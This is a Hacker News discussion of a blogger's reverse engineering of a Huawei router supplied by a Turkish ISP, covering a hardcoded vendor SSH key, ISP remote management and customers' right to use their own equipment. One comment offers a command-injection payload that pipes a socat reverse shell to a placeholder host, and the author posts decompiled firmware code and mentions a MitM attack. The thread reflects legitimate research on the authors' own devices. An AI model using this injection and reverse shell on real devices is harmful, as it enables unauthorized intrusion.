[HN Gopher] A detailed look at the router provided by my ISP
___________________________________________________________________
A detailed look at the router provided by my ISP
Author : paddlesteamer
Score : 487 points
Date : 2020-03-25 10:55 UTC (1 days ago)
(HTM) web link (0x90.psaux.io)
(TXT) w3m dump (0x90.psaux.io)
| wyclif wrote:
| I'm overseas now, and using one of these crappy ISP-provided
| routers. I miss my nice Linksys router back home with high-
| density mesh, tri-band WiFi, and four gigabit ethernet ports.
| 1_player wrote:
| Very interesting article.
|
| What about that precompiled .ssh/authorized_keys with user
| z00163152@HUAWEI-627FB9A3 mentioned in Part 3?
|
| Any reason why a router firmware would permit root access to
| anyone at all? Definitely sounds like a backdoor to me.
| skoskie wrote:
| That was the worst part. I would have that bombshell as the
| lede. And then delete it if possible.
| tibbydudeza wrote:
| Wow some good detective skills at work here , got a similar
| Huawei HG635 from my provider ... kept it because it supports LTE
| cutover.
|
| Fortunately some kind person leaked the admin password so that I
| could configure it to my liking.
| j_h wrote:
| EU net neutrality regulation grants end users right to use their
| own equipment.
|
| https://fsfe.org/activities/routers/
| Someone1234 wrote:
| Turkey isn't in the EU.
| anticensor wrote:
| IANAL, but Turkcell would lose the case in Turkey too. This
| is not due to net neutrality regulations (Turkey deliberately
| lacks it), but due to case law arisen from competition and
| customer rights regulations. However, telcos work around that
| too, by "leasing" modems, like telephone divisions did in the
| past. Does the trick of "leasing" work in the EU too?
| mercora wrote:
| in marketing they try hard to make it sound like what you
| are going to get by renting their device is WiFi not just
| the ability to turn on WiFi functionality of the CPE. of
| course everybody wants that but most people don't get
| that's not something that has to be provided by the ISP. I
| am not sure if its required, but i have seen often a lower
| end device (without WiFi accessible) is given for the
| lifetime of the contract free of charge.
|
| in Germany you have the right to use a compatible device
| you own yourself. However my ISP Vodafone does not accept
| lots of modems as compatible and when this regulation
| started there were basically none you could actually buy.
| Its not much better now i guess but i distress.
|
| EDIT: reading your comment again the trick you mentioned
| probably works because its "yours" when you lease it
| instead of renting it?
| anticensor wrote:
| Not instead of renting, but of selling.
| mercora wrote:
| note there is only Germany, Italy and the Netherlands with this
| regulation enforced. they even link to a [0]page with progress
| of that campaign.
|
| [0]
| https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...
| non-entity wrote:
| A while back, I was playing around with the cable modem / router
| the ISP gave me because I was curious and an idiot. After
| screwing around a bit, I managed to find a vulnerability that
| exposed technician credentials plaintext and they actually
| worked. Had no idea where to report it though, because the
| manufacturers contact page could be summed up as _fuck you we don
| 't talk directly to consumers_. I dont think the vulnerability
| was that bad, as you had to be logged in to the web interface
| already with another account, but still.
|
| I don't really trust ISP provided hardware / software now though.
| Bartweiss wrote:
| > _you had to be logged in to the web interface already with
| another account_
|
| Obviously I don't know specifics, but if this applies to any
| router which has multiple tiers of login then it could be a
| pretty serious problem. I suspect that might be true for
| routers designed specifically broadcast multiple networks (e.g.
| school or shared apartment-building routers)?
| praptak wrote:
| The right thing to do in such circumstances is to publish the
| vulnerability.
| ProZsolt wrote:
| But how do you publish it without the liability of getting
| sued? A person like me who don't work in security still
| occasionally find some vulnerability. Sometimes you get angry
| emails from the company even if you just try to warn them.
| jeroenhd wrote:
| If you think they'd sue, you can always send the details to
| a tech journalist specialized in such matters (someone with
| a proven track record of protecting their sources). Use an
| anonymous email service to be sure.
|
| If something goes wrong, they'll take the thread of legal
| action and probably win. Companies know that suing
| journalists often leads to more bad press than cooperating.
| They can even try to contact the company in question for
| you if the vulnerability is bad enough.
|
| If the company doesn't respond or get their shit together,
| journalists will get a scoop and the company is forced to
| fix their shit. If the company does fix their shit, the
| journalist will still get a story out of it and you can
| rest easy that you've helped make the internet just a
| little bit safer for everyone.
| saagarjha wrote:
| Publish the angry emails too.
| praptak wrote:
| Getting sued for what? Also, you can publish anonymously.
|
| Sitting on exploits forever only helps attackers and gives
| false sense of security to dumb companies.
| steerablesafe wrote:
| You never know. The same technician credentials could
| potentially work on many routers from the same ISP, maybe even
| through WAN.
| mercora wrote:
| it looks like this CLI has some hardcoded shell commands with
| variable substitutions that look possibly unprotected against
| command injection.
|
| For example iptables %s > %s 2>&1
|
| could probably be executed as iptables -L; socat
| tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane >
| /var/IptablesInfo 2>&1
|
| by issuing iptables -L; socat tcp-
| connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
| and therefore it might be possible to get real shell access too.
| paddlesteamer wrote:
| Hello, OP here, I've actually spent considerable amount time to
| find a code execution. I know you'll want to learn details of
| FUN_004122c0 but here is the decompiled version of iptables
| part from ghidra:
|
| undefined4 FUN_004045a0(int param_1,int _param_2)
|
| { int iVar1; int iVar2; char _pcVar3; char cVar4; code _pcVar5;
| undefined auStack544 [256]; undefined auStack288 [260];
| FUN_00412530(auStack544,0,0x100);
| FUN_00412530(auStack288,0,0x100); if (param_1 == 0) {
| FUN_004122c0(auStack288,0x100,"iptables > %s
| 2>&1","/var/IptablesInfo"); } else { iVar1
| = FUN_00412210(0x100); if (iVar1 == 0) {
| return 0x40010009; } cVar4 = '\0';
| while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
| if (cVar4 == '\0') {
| FUN_004122c0(iVar1,0x100,0x412c84,iVar2); }
| else { FUN_004122c0(iVar1,0x100,"%s
| %s",iVar1,iVar2); } cVar4 = cVar4 + '\x01';
| param_2 = param_2 + 1; }
| FUN_004122c0(auStack288,0x100,"iptables %s > %s
| 2>&1",iVar1,"/var/IptablesInfo"); FUN_00412660(iVar1);
| } FUN_00412330(auStack288); iVar1 =
| FUN_004123c0("/var/IptablesInfo",0x414f68); if (iVar1 ==
| 0) { pcVar5 = FUN_004126e0; pcVar3 = "Fail\r";
| } else { while (iVar2 =
| FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
| FUN_004126b0(0x412c84,auStack544); FUN_004121a0(0xd);
| } FUN_00412520(DAT_0042b010);
| FUN_004123a0(iVar1); pcVar5 = FUN_00412500;
| pcVar3 = "/var/IptablesInfo"; } (*pcVar5)(pcVar3);
| return 0;
|
| }
|
| Any ideas?
| mercora wrote:
| i guess you already tried issuing commands like i mentioned?!
|
| i am still confused by this code but to me it looks like this
| has been originally written in another language but maybe
| this is just what it looks like after de-compiling.
| FUN_004122c0(auStack288,0x100,"iptables %s > %s
| 2>&1",iVar1,"/var/IptablesInfo");
|
| for me it looks like FUN_004122c0 is a function of some
| object in auStack288 (maybe at offset 0x100?) probably
| passing the remaining arguments to a sprintf like function
| before executing it... or maybe it is a function to call
| instance methods in general and this happens to be the
| 0x100th function or something...
|
| not sure i am getting this right ive never tried this before
| ^^ seeing this function would likely be more interesting
| Faaak wrote:
| Depends if they `execve` or run the command inside a shell.
|
| I'd bet for (1), but who knows.
| Hello71 wrote:
| redirections aren't parsed by exec....
| Faaak wrote:
| Indeed, I read the command's template too fast. Well, in
| this case it's worrysome
| Aachen wrote:
| Controlling arguments without shell often still leads to
| RCE though, because a lot of software has some flag that
| runs some command
|
| https://0x90909090.blogspot.com/2015/07/no-one-expect-
| comman...
| blakesterz wrote:
| Interesting read! There's actually 3 parts to this:
|
| Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-
| Already...
|
| And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
| Already...
|
| Summary from the end of Part 3:
|
| "So we managed to change passwords for both ssh and telnet, gain
| access to Root user for the web interface, changed that password
| too. We changed ACS URL to ours and remove the IP restrictions.
| To put it simply, we cleaned up our router from our ISP. Good for
| our privacy."
| sheep-a wrote:
| You forgot this bit of the summary, which I think is more
| interesting!
|
| "Still there is an authorized ssh key left in the firmware but
| for now it's enough that we're keeping the ISP out. Maybe in
| the future, we can repack the firmware with our configuration
| and keys and install it on the router. For now, take care!"
| Craighead wrote:
| Huawei implies Chinese intelligence services left that there
| stevespang wrote:
| If you are in Turkey, Egodan's boys are spying on
| EVERYONE,especially after the attempted coup. Huawei is happy to
| provide spying through the router to Ergodan's Boogiemen - - in
| fact, several of them are probably next room over from you
| watching your screen now . . .
| fulafel wrote:
| Trivia: Strictly speaking a box that does NAT is not a router in
| the IP protocol sense, it's a kind of proxy. The router
| requirements RFC explicitly forbids altering most fields (incl
| the address field) in the IP header.
| icedchai wrote:
| ...an RFC that was written in 1995, before NAT was really
| necessary.
|
| My view: If it forwards IP between different networks, it's a
| router.
| fulafel wrote:
| Nat existed in somewhat wide use in 95, PIX had come out
| recently. It's not necessary today either.
| icedchai wrote:
| It existed, but was definitely not in wide use. I worked
| for several early internet providers during that period
| (mid to late 90's.) Most folks had public addresses on
| their desktops. No customer we ever set up wanted NAT. Most
| didn't even have firewalls, sadly! Some of these were small
| companies, some of these were large corporations or
| universities.
|
| And I'd argue NAT actually _is_ necessary if you want IPv4
| for home use. We 'd be out of addresses otherwise.
| fulafel wrote:
| ISPs didn't use it in the early days, but it was used in
| corporate/organizational networks. The PIX was apparently
| marketed as a security appliance (heh) so that defined
| the user base to a large extent.
|
| You can access the web over v4 with other kind of proxies
| besides NAT, for example application level HTTP proxies.
| If you want working v4 for all the protocols, NAT is out
| by definition anyways.
| icedchai wrote:
| Yes, I remember the PIX! Probably late 97 or 98, I set
| one up for a large corp. They were not using NAT
| previously, but HTTP and socks proxies.
| packet_nerd wrote:
| The box in people's home's colloquially known as a router
| actually commonly combines a lot of functions into one:
|
| * router
|
| * firewall
|
| * NAT device
|
| * modem
|
| * switch
|
| * access point
|
| * DNS resolver
|
| * DHCP server
|
| And probably others I'm not thinking of :-)
| fulafel wrote:
| Adding more functions to a router doesn't make it a non-
| router. But if it's doing NAT and not routing, then it's a
| different distinction. But yep it depends on the
| configuration.
| qubex wrote:
| I call them "terminal adapters", because I'm still stuck in
| the ISDN age.
| sandov wrote:
| ONT in the case of fiber. Don't know if it technically counts
| as a modem.
| bobbob1921 wrote:
| Media converter maybe? (Like those $100 or so fiber to
| ethernet converters, I say this as it's usually a
| modem/router plugged into the ONT's ethernet port that does
| isp to cpe authentication, tunneling, etc. so the ONT is
| just converting fiber (from isps OLT) to ethernet for
| something more common to plug into)
| iso1631 wrote:
| I have a box that runs various routing protocols including OSPF
| and BGP, but also does nat where it needs to. It's known as a
| "router"
| c0nsumer wrote:
| Very true. Yet at the same time, it does route traffic to the
| appropriate boxes. And the name 'router', when referring to
| something someone has at their house, has entered the
| vernacular to mean "the box at home which lets me share the
| internet connection across all my computers".
|
| Most folks have no idea how it works behind the scenes, which
| typically is a combination of NAT (IPv4), routing (IPv6), DHCP,
| DNS, UPnP, and more. So, it's just "the router".
| zamadatix wrote:
| The NAT RFCs came after the routing RFC and refer to NAT as a
| router function not as an orthogonal function, boxes that do
| NAT are referred to as routers in the RFC. This is reflected in
| the real world where NAT is implemented as part of the routing
| chain not as a separate module. Remember NAT isn't a box
| creating 2 sockets and ferrying data between them it is just
| the translation of fields on top of normal routing
| functionality.
| the8472 wrote:
| > boxes that do NAT are referred to as routers in the RFC.
|
| Newer RFCs use different terms such as CPE (customer premises
| equipment) and AFTR (address family transition router)
| gerdesj wrote:
| RFC 1918 does allow that the internet was changing rather fast
| back in 1995 and accepts it probably wont be the final word:
| https://tools.ietf.org/html/rfc1812#section-1.3.1
| tssva wrote:
| Trivia: Strictly speaking a box that does NAT is not a kind of
| proxy. Proxies act as the destination end point of one
| connection, establish a separate connection to another endpoint
| and forward data between the two separate connections. A NAT
| device changes IP header information such as the address field
| and if also doing PAT the port field but doesn't act as the
| source or destination for connections.
| mafuy wrote:
| Many people here pointed out a problem: Removing access for the
| ISP and/or device manufacturer means they cannot fix bugs
| remotely and automatically. This is bad in situations like when
| the Mirai malware hit.
|
| How about this?: "You can use your own device and we provide all
| required information, but there will be no advanced support and
| you have to check for bugfixes yourself monthly."
|
| ... now that I wrote it, I see the answer: There is no way to
| enforce this, especially not reliably.
| marcosdumay wrote:
| Ok, from the Wikipedia:
|
| > Mirai then identifies vulnerable IoT devices using a table of
| more than 60 common factory default usernames and passwords
|
| Taking control of the device is exactly the kind of thing that
| stops that attack.
| davedx wrote:
| Fantastic write up from a hacking point of view. I did wonder
| about this statement though:
|
| "This is very invasive and unacceptable. It may seem necessary to
| apply security patches published by your ISP but the user should
| be able to disable it whenever she wants."
|
| Legally, at least in countries where I've lived, the ISP still
| owns the router. This surprised me a bit when I first found out,
| but then I got used to the idea, but you should treat any ISP or
| telecom gear in your house as something that's "rented but still
| owned and controlled by someone else".
| yjftsjthsd-h wrote:
| And that is why I have my own router plugged into the ISP
| router:)
| blacksmith_tb wrote:
| True, but I think it's worth comparing it to other utilities in
| your home - what if your electric company could make all your
| lightbulbs 20% dimmer without notice? Or if your water heater
| was remotely administered? ISPs, like mobile telcos, like to
| claim they must have control over your hardware "for security"
| but I think the most charitable interpretation is that it's to
| make their customer service dept. sweat less (more nefarious
| possibilities exist, of course).
| CJefferson wrote:
| The difference is that non-updated routers can cause global
| problems. At the very least as an ISP I'd want to say you can
| look after updates yourself, but we will disable your access
| to the internet (other than to get the update from us)
| whenever we try to push an update to you and you reject it.
| ProZsolt wrote:
| This is why I like separate modems, so there is a clear
| border between you and the ISP. Sadly currently most of the
| providers only give you AIOs.
| Thaxll wrote:
| You're lucky to have an SSH server active, on mine I had to open
| the router and dump the firmware manually :/
| lxe wrote:
| > After looking into folders, I found some interesting files. I
| won't go through them here but I want to mention just one of
| them: [$ cat etc/ssh/authorized_keys]. Maybe an engineer from
| Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific
| DSS key, can connect all HG253s routers without needing a
| password, who knows?
|
| Who knows indeed?!
| AdmiralAsshat wrote:
| I never thought to nmap my own router until reading this.
| PORT STATE SERVICE 53/tcp open domain 80/tcp
| open http 631/tcp open ipp 5000/tcp open upnp
| 7777/tcp open cbt 20005/tcp open btx
|
| Now begins the three-hours-and-counting rabbit hole of trying to
| figure out what the hell is running on ports 7777 and 20005. Or
| why UPNP is apparently running, despite UPNP being explicitly
| disabled on the Netgear router's admin page.
| manifoldgeo wrote:
| Maybe it's a remote administration port for your ISP. I have a
| router provided by Froniter, formerly Verizon FiOS, where port
| 4567 is always open and cannot be closed with a firewall rule
| from the router's web UI (grayed out). After some googling I
| found out that it's their maintenance port:
| https://www.speedguide.net/port.php?port=4567
|
| For a while I had my own OpenWRT router in place of the ISP
| one, but I think they got wise to it and blocked the MAC. I
| changed it to match the ISP router's MAC address, but it only
| worked for about 3 minutes before being blocked again.
| AdmiralAsshat wrote:
| I bought both my modem and my router, so I'd be a little
| incredulous if my ISP had somehow forced a port open on it.
|
| The 20005 one _may_ be some port that NetGear uses for its
| USB Printing, I 've found some articles that mention it.
|
| It also struck me that I hit it with nmap using the LAN IP,
| so perhaps these are only open _within_ the network. I
| probably need to hit the external IP of the router to see
| what is externally open. ShieldsUP! didn 't show anything
| unusual.[1]
|
| EDIT: Disclosure of a vulnerability regarding port 20005[2],
| and Netgear confirming that it does affect my router[3], but
| should have been fixed. I assume the "fix" was fixing the
| buffer overflow vulnerability, rather than closing the port
| altogether.
|
| [1] https://www.grc.com/x/ne.dll?bh0bkyd2
|
| [2] https://www.kb.cert.org/vuls/id/177092/
|
| [3] https://kb.netgear.com/28393/NETGEAR-Product-
| Vulnerability-A...
| jason0597 wrote:
| It's funny to think that if you were to report all of your
| findings to your local newspaper (Turkish newspaper in this
| case), as to how Turkish ISPs have complete access to your router
| or how Huawei (China) has an SSH key for your router, people
| would go absolutely ballistic. But for us it's just another day
| of expected craziness and we're tired of talking about it
| kuesji wrote:
| i don't think too many people care about this. ( yes, i live in
| turkey )
| Someone1234 wrote:
| > how Turkish ISPs have complete access to your router
|
| You think it is going to blow people's socks off that a router
| provided and controlled by an ISP is accessible by that same
| ISP? Huh?
|
| The Huawei SSH key is a little strange, but depressingly common
| for network equipment, even big names like Cisco[0].
|
| [0]
| https://tools.cisco.com/security/center/content/CiscoSecurit...
| Eremotherium wrote:
| >even big names like Cisco
|
| Even? By now Cisco having hardcoded credentials and glaring
| security fuckups is a meme.
| gumby wrote:
| > The Huawei SSH key is a little strange, but depressingly
| common for network equipment, even big names like Cisco...
|
| There's an understandable reason for this: the isp's staff
| aren't necessarily any more competent than the isp's
| customers (some are, but there are so many ISPs that I
| suspect they are now a small minority). So just at the isp
| wants to be able to reset your interface devices remotely, so
| will Huawei and Cisco support for the ISPs themselves.
|
| I am not implying that "understandable" means "justified"
| p1esk wrote:
| Yeah, no one cares outside of hackernews.
| blaser-waffle wrote:
| Hell, I'd imagine my grandmother or other non-tech family
| would be glad the telephone company can pop in and fix it
| Thaxll wrote:
| If that stuff listen to the interface of your public IP which
| is most likely not the case, but yes it's still scary.
| closeparen wrote:
| CPE is just part of the ISP's infrastructure that happens to be
| in your house. There is no need to trust it. Just put your own
| router in front of it.
| hazeii wrote:
| Indeed, I've had a linux box between the router and the local
| network since the days of dial-up (originally it _was_ the
| dial-up box, which made and shared the 'net connection). The
| only reason I've ever had to upgrade the hardware has been
| because the original setup only had 10MBps NICs.
| TheSpiceIsLife wrote:
| > if you were to report all of your findings to your local
| newspaper ... people would go absolutely ballistic.
|
| You reckon? I don't think they'd even be interested in hearing
| about it.
|
| Where do you live and who is your local paper that leads you to
| believe they'd bother writing, let alone publishing, such a
| story?
| kspacewalk2 wrote:
| Turkish newspapers are almost universally subservient to the
| autocratic government. Any free press that's still somehow
| around has way more consequential dictatorial abuses of power
| to report on, if they dare.
| 0xff00ffee wrote:
| I'm pretty sure my new CenturyLInk fiber router is similar. I
| tried to create a PPoE connection from my WRT1900 direclty to
| century link using the same credentials and I couldn't connect
| to my internet. However, now I am motivated to create a bridge
| and find out why.
|
| For CenturyLink fiber I have two boxes:
|
| Box A: the exterior fiber enters this box, the tech said it was
| a "translator"; and the port 4 ethernet on it goes to ...
|
| Box B: the centurylink wireless router, which performs the PPoE
| with my credentials which were somehow hardwired because no one
| ever told me my username/password. I'm guesing TR-069? Then
| port 4 on this goes to ...
|
| Box C: MY WRT1900AC, which then goes to other subnets for my
| cameras, lab, and office.
|
| I figured Box B was redundant, but trying to remove it has been
| problematic.
| tenebrisalietum wrote:
| B probably exists so they can split fiber between multiple
| end users or support things like phone service over the same
| link. Did you use the same VPI and VCI? PPPoE also sends an
| identifier (the "Host-Uniq" tag if I'm understanding it
| right) that probably has to match what your ISP is expecting
| or has assigned.
| Tourus wrote:
| > PPoE with my credentials which were somehow hardwired
| because no one ever told me my username/password
|
| They make it very hard to use your own "Box B", but I've set
| this up twice now (most recently last week). Get the username
| and password from CenturyLink (the tech that installs the
| service has this, or call them). Then, google search "century
| link vlan 201 wan tag". The trick is you need a router that
| has this functionality, most basic consumer ones don't.
|
| Unfortunately, even if you follow all directions and it still
| doesn't work troubleshooting is a nightmare, very little or
| no help from their customer support.
| 0xff00ffee wrote:
| Ah I see. My WRT1900AC doesn't have that option. I was
| running OpenWRT but ran into some issues and panicked back
| to the default firmware. Now that I have another wireless
| router I might dare it again.
| JackRabbitSlim wrote:
| I had CL fiber. VLAN tagging; The vlan tagging value was so
| high, OpenWRT didn't support it so I was left with the
| useless middle box. Your mileage may very.
| 0xff00ffee wrote:
| I was just about to re-install OpenWRT, but I guess I won't
| now.
| 0xff00ffee wrote:
| Why did port 8015 show up on the remote system after resetting
| firmware? Shouldn't nmap have reported that?
| usmannk wrote:
| It was a "fast nmap", so only the top 100 most common ports
| were checked.
| 0xff00ffee wrote:
| Ah, thanks. If nmap was run exhaustively on all 64k ports,
| would that both (a) take forever, and (b) raise alarm bells
| on the target? Why isn't a full scan the norm?
| zeroflow wrote:
| ...and that's why my ISPs router is running in modem mode with a
| non-ISP-controlled router from Ubiquiti behind it - which I may
| replace with a pfSense box in the future.
|
| I'm pretty happy that my cable ISP is allowing this mode so I
| don't have to double-NAT in my setup.
| matheusmoreira wrote:
| You're lucky your ISP's router offers you that option. My ISP's
| VDSL2 router would require "unlocking" in order to get bridge
| mode and it can't be easily replaced.
| pwg wrote:
| This is why, in my case, the ISP's router (that awful box
| Verizon provides with FIOS) is sitting, beside the DMARC,
| unplugged and powered off.
|
| My DMARC has a hot ethernet jack, and _my_ firewall (PC running
| Linux) that I control is connected to that ethernet jack. No
| ISP shenanigans (other than what they can remotely do to
| configure the FIOS DMARC itself).
| awelkie wrote:
| If your ISP didn't have that feature, could you just replace
| the cable modem too? My ISP's router is running EuroDOCSIS 3.0
| and I'm wondering if I could replace the router with a modem +
| router of my own.
| zeroflow wrote:
| Sadly I could not, since the ISP is defining the router as
| the endpoint of it's network so there is no freedom to choose
| different models.
| em-bee wrote:
| practically though what is the difference between having
| the endpoint in a shaft by the elevator or in your
| apartment or even down the street? in all scenarios i'd put
| my own router behind the ISP equipment and run my local
| network however i want.
|
| the only issue is with getting a public ip address for
| inbound connections.
|
| here we are not getting public ip addresses anyways, so the
| point is moot for me. but if you do get one, then all they
| need to do is configure their router to forward the public
| ip to yours.
|
| in my case the ISP even installed two routers. one was
| theirs that i had no access to and one was "ours" that i
| was able to configure as i liked or replace with my own.
| both routers had their own wifi, but i don't use the one
| from the ISP endpoint router
| mercora wrote:
| if you happened to live in Germany there is a law in place
| that force ISPs to allow that. But if you would live in
| Germany you would probably know about this. That said there
| is no technical reason making it impossible. If you connect
| an unknown device here, you get access to the customer web
| panel only and can register your device using it. Afterwards
| it gets provisioned as usual (with caveats [no PacketCable
| for example])
| pmlnr wrote:
| Yes, you could, but the new router+modem needs to be
| "accepted" by the DOCSIS provisioning. Talk to the support
| about it.
| skoskie wrote:
| I have been so disappointed with my ubiquiti hardware. That UI
| is gorgeous, but lacks some real functionality that I need. I
| can't block BitTorrent (see forums). And I can't see a detailed
| traffic log; only the categories. Plus, those pretty graphs
| that tell you how much data you've used doesn't give a time
| frame. I have no idea if it's a week or a month.
|
| I think pfSense will be my next too.
| bonestamp2 wrote:
| I recently upgraded my internet speed and my pfSense box was
| limiting my top download speed. So, I just went from pfSense to
| a Ubiquiti Secure Gateway. There are pros and cons of each, but
| I couldn't find any trustworthy pfSense hardware with the
| performance of a USG for anywhere near the same price. I do
| miss the configurability of pfSense though so I might switch
| back some day. That said, the ubiquiti interface and
| provisioning model is really slick.
| chrisweekly wrote:
| I'd be grateful for guidance eg a link to a writeup of
| recommended hardware and config for a reasonably technical
| audience, eg "Given a Verizon FIOS G1100, put it in bridge mode
| and connect hw that supports software X"...
| mercora wrote:
| most of the time you only require PPPoE or DHCP as you
| practically speaking get a ethernet tunnel to your ISP using
| that bridge. Some ISPs additionally segment this network by
| VLANs so your list of required features is probably already
| complete here.
| hestefisk wrote:
| My ISP (Internode) provide a 'modem' for my NBN hybrid coax /
| fibre connection. I just put my OPNSense router in front of it
| and it's all secure. They provided me with all the config
| settings, which are a bit more obscure than usual (PPPoE but on a
| specific vlan tag). Works like a charm and I don't have to worry
| about weird government wiretapping or backdoors. My ISP provide
| an IPv6 range too, which is pretty cool.
| miki123211 wrote:
| Apparently a polish carrier called Multimedia has recently
| introduced a new, revolutionary service for some customers. It's
| called "set up a custom wi-fi configuration", and it's just 5 pln
| (a little over $1)! It lets you think up of a ssid and password,
| and configure your router to use those! That's an amazing
| invention, isn't it? /s
|
| Some customers apparently have absolutely no access to their
| routers, not even to the web interface, and they can't use their
| own either. All reconfiguration must be done through the customer
| service portal or by phone. That means the carrier can change for
| every little thing, including changing the Wi-Fi config! I'm not
| sure if you can even bridge, but I guess not. Note that this does
| not affect all customers of that carrier, just a minority.
| gbrown wrote:
| Couldn't you just daisy chain a second router via Ethernet and
| use it? Bonus points for VPN-ing all of your traffic.
| the8472 wrote:
| Daisy-chaining routers is can severely degrade some services
| (gaming, p2p) due to NAT. Assuming the ISP-provided one
| supports PCP or UPnP-IGD you need a client on your own router
| that relays port forwarding configuration to the upstream
| router. This is possible but may need non-trival setup.
| pathseeker wrote:
| PCP that allows ingress connections without an established
| egress connection is rarely enabled. The same applies to
| UPnP because of the baddies.
|
| https://en.wikipedia.org/wiki/Port_Control_Protocol#Securit
| y
| ege_erdogan wrote:
| I am using the exact same router from the same ISP. I was
| wondering what the problem was when I wasn't able to forward port
| 22 to my computer for an SSH connection.
|
| I had thought it had something to with the ISP allocating the
| same static IP to multiple clients and blocking some common ports
| to prevent collisions (ended up using port 109.. something for
| SSH). Turns out it was more interesting!
| gumby wrote:
| I clicked through to the two follow ups -- this is both excellent
| sleuthery and a wonderful write up.
| sloshnmosh wrote:
| I very much enjoyed this! I bookmarked your site and hope to read
| more of your posts in the future.
| jscholes wrote:
| Enjoyed this write-up, but most of the exploration seemed to be
| facilitated by someone having already leaked the CLI root
| password online. Anyone have suggestions on how you might
| otherwise obtain that information?
| paddlesteamer wrote:
| Hi, OP here, actually it's not true. Think the scenario as
| this: you don't have the CLI root password, you just do a MitM
| attack and learn about root password when your ISP attempts to
| change it. This applies my situation, also I could learn about
| the default password just by looking into the firmware.
| LeonM wrote:
| In the Netherlands we now have a law where ISPs must allow your
| own choice of network equipment. This means they must give you
| the required information on how to connect your own device with
| their network.
|
| I have a fiber connection, which I connected directly to a
| Ubiquity router through a suitable SFP module. My ISP supplied
| the information on the fiber type and which VLAN ID's to setup
| for internet, TV and telephony.
|
| This way I have my own equipment, that I control myself. The
| 'modem' [0] which my ISP supplied is still in its original,
| unopened box.
| lima wrote:
| Same in Germany! ISPs hate it because it it makes their lives a
| lot harder - in cable networks, they now have to deal with a
| zoo of endpoints on a shared medium vs. a small set of
| standardized devices.
|
| As a customer, I like it.
| metters wrote:
| They also hate it, because they cannot charge rent, like for
| the ISP owned router.
| pas wrote:
| Can't they still just provide you with a "modem" and give you
| full IP access through that? What difference does it make if
| they put the modem inside our outside your premises? (Eg they
| put a switch/DSLAM/modem into a box on the street and then
| they give you a cable?)
| pdonis wrote:
| _> ISPs hate it because it it makes their lives a lot harder
| - in cable networks, they now have to deal with a zoo of
| endpoints on a shared medium vs. a small set of standardized
| devices._
|
| In other words, ISPs hate it because it forces them to
| actually do their jobs and be ISPs. The Internet itself is "a
| zoo of endpoints on a shared medium", and ISP stands for
| _Internet_ Service Provider.
| josephmosby wrote:
| It's not the provision of Internet that's the problem, it's
| the customer service requests.
|
| e.g., AT&T could provide perfect service to the home
| endpoint, but the customer bought some aftermarket router
| from their cousin, who had configured it for Verizon.
| Customer calls AT&T to holler. Tier 1 support doesn't know
| what that particular router config GUI even looks like, so
| it gets bumped to T2 or T3. Ultimately to find out that the
| customer's cousin had hardcoded DNS to some internal
| Verizon system that's not visible to AT&T.
|
| Repeat x100K. ISPs job isn't just "provide the Internet,"
| it's also "provide all the troubleshooting for every non-
| technical customer who just wants to watch Netflix but
| doesn't even know what a router is"
| ClumsyPilot wrote:
| Well, my understanding is that once you have your own
| router, it's up to you to ensure its configured
| correctly.
| pdonis wrote:
| Exactly. I have my own router (and cable modem, for that
| matter), and I don't call Comcast when one of them
| breaks; I fix it myself, since I own them.
| kitteh wrote:
| Problem is you'll eventually reach a point where the
| problem is deep and requires them to escalate, and if you
| aren't checking the box of tested customer cpe they'll
| stop. Example of this is when I found a Comcast backbone
| link with an incorrect/inconsistent MTU setting. Had to
| go back channel in the end to someone on the ibone team,
| but I had no chance in hell of getting that fixed
| promptly via regular support.
| pdonis wrote:
| _> you 'll eventually reach a point where the problem is
| deep and requires them to escalate, and if you aren't
| checking the box of tested customer cpe they'll stop_
|
| I've been a Comcast customer for more than 20 years (in
| two different states) and have never encountered a
| problem like this, so I expect such problems are
| extremely rare. Every issue I've had has been of the kind
| where Comcast's support person can see right away that
| there's a problem on their end because they can't even
| see my cable modem's status even though I confirm to them
| that it's powered up and the cable is connected (and of
| course I have to go through the dance of rebooting it
| multiple times before they'll be satisfied). Most of the
| time they put me on hold for a while and then come back
| and the problem is fixed (I assume because some tech in
| the background rebooted or reset something that was
| borked). Once they had to send a tech to my house and it
| turned out there was a bad connection in the junction box
| they had installed outside.
| matheusmoreira wrote:
| > provide all the troubleshooting for every non-technical
| customer who just wants to watch Netflix but doesn't even
| know what a router is
|
| People who don't even know what a router is don't buy
| their own equipment. Those who buy better routers don't
| require support for them, they call when there's a
| problem between the ISP and the router.
| pdonis wrote:
| _> ISPs job isn 't just "provide the Internet," it's also
| "provide all the troubleshooting for every non-technical
| customer who just wants to watch Netflix but doesn't even
| know what a router is"_
|
| No ISP that I'm aware of will provide troubleshooting for
| devices they don't own. They just say "sorry, not our
| device, not our problem". When I installed my own cable
| modem and router, Comcast was quite clear about that. And
| I said "fine, no problem".
| jmiserez wrote:
| My ISP does, but they're the exception to the rule and
| cater to techies. Of course support questions for random
| devices need to be more specific than just "it doesn't
| work".
| pdonis wrote:
| _> My ISP does_
|
| Out of curiosity, which ISP do you have?
| jmiserez wrote:
| init7.net. They have a bunch of official guides, but also
| help with other devices and have debugged issues with new
| devices. Basically if your device is capable they want to
| make it work.
| thallian wrote:
| Init7 is great, I only had to tick a checkbox saying
| something like "I know what I am doing" and apart from
| providing the technical information they left me alone.
| Only had one problem with them that they resolved very
| quickly (the fiber cable got damaged somewhere in the
| basement).
| kitteh wrote:
| +1 to init7. They've gone above and beyond when I needed
| them to change their routing policies to improve end to
| end latency to a specific destination. Good luck getting
| that from a major us carrier. And I wasn't even a
| customer.
| iagovar wrote:
| The ISP I work for does, and it's a very large one (not
| in the US). If a router is not ours, we check for sync or
| if PPPoE is up. We tell the customer what's the result of
| our tests and offer a technician if they are willing to
| pay in case it's not our fault.
|
| Most people are unwilling to pay, and yell at customer
| service. Most of the times, specially when the router has
| sync it's customer fault.
| the8472 wrote:
| > we check for sync or if PPPoE is up.
|
| The problem with this kind of procedure is that it's only
| a reasonable way to locate the problem when there are
| problems at that very moment. You're getting stonewalled
| when - during the day - you're reporting that it
| frequently loses sync during the night.
| CameronNemo wrote:
| I work at an ISP of sorts. It is a regional research and
